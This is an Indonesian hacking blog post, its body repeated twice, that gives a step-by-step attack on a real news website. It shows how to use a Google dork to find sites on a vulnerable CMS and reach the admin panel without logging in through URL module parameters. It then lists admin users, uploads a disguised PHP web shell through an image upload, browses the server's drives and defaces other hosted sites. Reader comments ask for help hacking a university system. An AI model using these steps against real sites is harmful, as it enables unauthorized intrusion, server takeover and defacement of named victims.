10.26
dansle
Nih UNJ, SIAKAD nya malah... Klik Here
OK POC nya :
1. Buka Mbah Google ketik
---> allinurl:media.php?module
2. Cari target misalnya mmmm ap ya...... OK BALIPOST.COM
ketik di address browser jadi
---> http://www.balipost.com/admin/
kalau target selain balipost mungkin halaman admin beda namanya, coba adminweb atau administrator .
3. Nah, sekarang tinggal tebak deh User ma Password nya... hehhehe Becanda.... ^^
OK, tambahkan content.php di browser, jadinya gini : http://www.balipost.com/admin/content.php
Ups...*** MODULE BELUM ADA, hadooh gimana nih TS...***
4. hehehe tenang ja.. gw dah pelajari ini dan tinggal isi module nya.
tambahin lg d address : ?module=home
jadi gini : --> http://www.balipost.com/admin/content.php?module=home
5. Prok Prok Prok,,,, anda masuk halaman admin tanpa LOGIN .... wah hebat sekali....
*** Trus ngapain lagi nih gan,,, cuma tulisan gini doank***
6. Tenang aja,, gw dah pelajari ini.... hehehe...
ganti module=home jadi module=user...
jadi ==> http://www.balipost.com/admin/content.php?module=user
7.Uuuppppssss... kena deeeehh... tuh username admin nyaaaa.... BUT, g usah cari password nya repot2... tuh dah d sediain wat tambah user nya... KLIK aja...
*** Udah buat nih Gan, tpi kok muncul "Untuk mengakses modul, Anda harus login " ***
8. Lagi2 Uuupppsss.... coba aja KLik LOGIN, truz coba pke username dan password kamu...
*** Gaaan, ga bisaaaaa..... ***
9. UPs Lagi,,, brrt Web ini g bsa bikin user baru... hmmm klo gitu qta Tanem shell aja... huehehehe
Ganti module=user jadi module=berita
jadi ==>> http://www.balipost.com/admin/content.php?module=berita
*** WOOWW Gan, kereeeen, truz gimana tanem shell nya ***
10. OK, skrg edit salah satu berita nya... hmmm, yg aman berita yg paling belakang gan....
Misalnya
http://www.balipost.com/admin/conten...erita&id=30675
nah di bawah nya ada tempat untuk upload tuh...
*** Wah gan, itu kan untuk upload gambar ***
11. Hmmm, g ad salahnya kan qta coba...
>>> Nama shell nya yg bagus, biar samar2,, misalnya : conf.php<<<
12. OK, ga ada penghalang tp ad tulisan sma kyk td ....
COba kalian tulis di address jadi :
http://www.balipost.com/admin/foto_berita/xxxxx.php
xxxxx itu nama shell kamu...
... selesai deh... hahah sebenerna cara nya mudah cuma gw bikin panjang aj biar kalian rajin membaca....
*** Gaaan,,, kok ga bisa ****
zzzzz gw bisa weeeeeee.... ^^ ni shell gw...
Wah bahkan ini pke VPS atau kompi personal... so, kalian bisa akses drive C or D or E dst...
kalian jg bisa deface situs kerabatna seperti Jogjatv.tv dsb... lihati di drive D:/www/ beberapa nama domainnya ada... ^^ tinggal upload something...
CATATAN : Web nya dari INDONESIA... JANGAN DIRUSAK!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! !!!!!!!!!
-----------
Gwe ga copas, ga inspirasi dari siapapun.... gw research sendiri... gw dah pke layanan search, ga ada POC kyk gini...
Kalau bagi kalian ini berguna.... Please CENDOL nya.... ^^
Kalau ga berguna... wah gpp deh...
Gw minta maaf kpd Pak Lukmanul Hakim (Penulis buku Membongkar para master PHP *Best seller*), dan memberi tahu bahwa ada kelemahan pada web anda... ^^... Sekaligus berterima kasih karena web anda dikasih Lubang.... ^^ LOH???!!!!
-----------
by : Flamesofhell (IHT)
OK POC nya :
1. Buka Mbah Google ketik
---> allinurl:media.php?module
2. Cari target misalnya mmmm ap ya...... OK BALIPOST.COM
ketik di address browser jadi
---> http://www.balipost.com/admin/
kalau target selain balipost mungkin halaman admin beda namanya, coba adminweb atau administrator .
3. Nah, sekarang tinggal tebak deh User ma Password nya... hehhehe Becanda.... ^^
OK, tambahkan content.php di browser, jadinya gini : http://www.balipost.com/admin/content.php
Ups...*** MODULE BELUM ADA, hadooh gimana nih TS...***
4. hehehe tenang ja.. gw dah pelajari ini dan tinggal isi module nya.
tambahin lg d address : ?module=home
jadi gini : --> http://www.balipost.com/admin/content.php?module=home
5. Prok Prok Prok,,,, anda masuk halaman admin tanpa LOGIN .... wah hebat sekali....
*** Trus ngapain lagi nih gan,,, cuma tulisan gini doank***
6. Tenang aja,, gw dah pelajari ini.... hehehe...
ganti module=home jadi module=user...
jadi ==> http://www.balipost.com/admin/content.php?module=user
7.Uuuppppssss... kena deeeehh... tuh username admin nyaaaa.... BUT, g usah cari password nya repot2... tuh dah d sediain wat tambah user nya... KLIK aja...
*** Udah buat nih Gan, tpi kok muncul "Untuk mengakses modul, Anda harus login " ***
8. Lagi2 Uuupppsss.... coba aja KLik LOGIN, truz coba pke username dan password kamu...
*** Gaaan, ga bisaaaaa..... ***
9. UPs Lagi,,, brrt Web ini g bsa bikin user baru... hmmm klo gitu qta Tanem shell aja... huehehehe
Ganti module=user jadi module=berita
jadi ==>> http://www.balipost.com/admin/content.php?module=berita
*** WOOWW Gan, kereeeen, truz gimana tanem shell nya ***
10. OK, skrg edit salah satu berita nya... hmmm, yg aman berita yg paling belakang gan....
Misalnya
http://www.balipost.com/admin/conten...erita&id=30675
nah di bawah nya ada tempat untuk upload tuh...
*** Wah gan, itu kan untuk upload gambar ***
11. Hmmm, g ad salahnya kan qta coba...
>>> Nama shell nya yg bagus, biar samar2,, misalnya : conf.php<<<
12. OK, ga ada penghalang tp ad tulisan sma kyk td ....
COba kalian tulis di address jadi :
http://www.balipost.com/admin/foto_berita/xxxxx.php
xxxxx itu nama shell kamu...
... selesai deh... hahah sebenerna cara nya mudah cuma gw bikin panjang aj biar kalian rajin membaca....
*** Gaaan,,, kok ga bisa ****
zzzzz gw bisa weeeeeee.... ^^ ni shell gw...
Wah bahkan ini pke VPS atau kompi personal... so, kalian bisa akses drive C or D or E dst...
kalian jg bisa deface situs kerabatna seperti Jogjatv.tv dsb... lihati di drive D:/www/ beberapa nama domainnya ada... ^^ tinggal upload something...
CATATAN : Web nya dari INDONESIA... JANGAN DIRUSAK!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! !!!!!!!!!
-----------
Gwe ga copas, ga inspirasi dari siapapun.... gw research sendiri... gw dah pke layanan search, ga ada POC kyk gini...
Kalau bagi kalian ini berguna.... Please CENDOL nya.... ^^
Kalau ga berguna... wah gpp deh...
Gw minta maaf kpd Pak Lukmanul Hakim (Penulis buku Membongkar para master PHP *Best seller*), dan memberi tahu bahwa ada kelemahan pada web anda... ^^... Sekaligus berterima kasih karena web anda dikasih Lubang.... ^^ LOH???!!!!
-----------
Posted in: Hacking
2 comments:
gan bisa hack siakad ga
gan siakad bagai mna cara bantuin gn,..,.,
Posting Komentar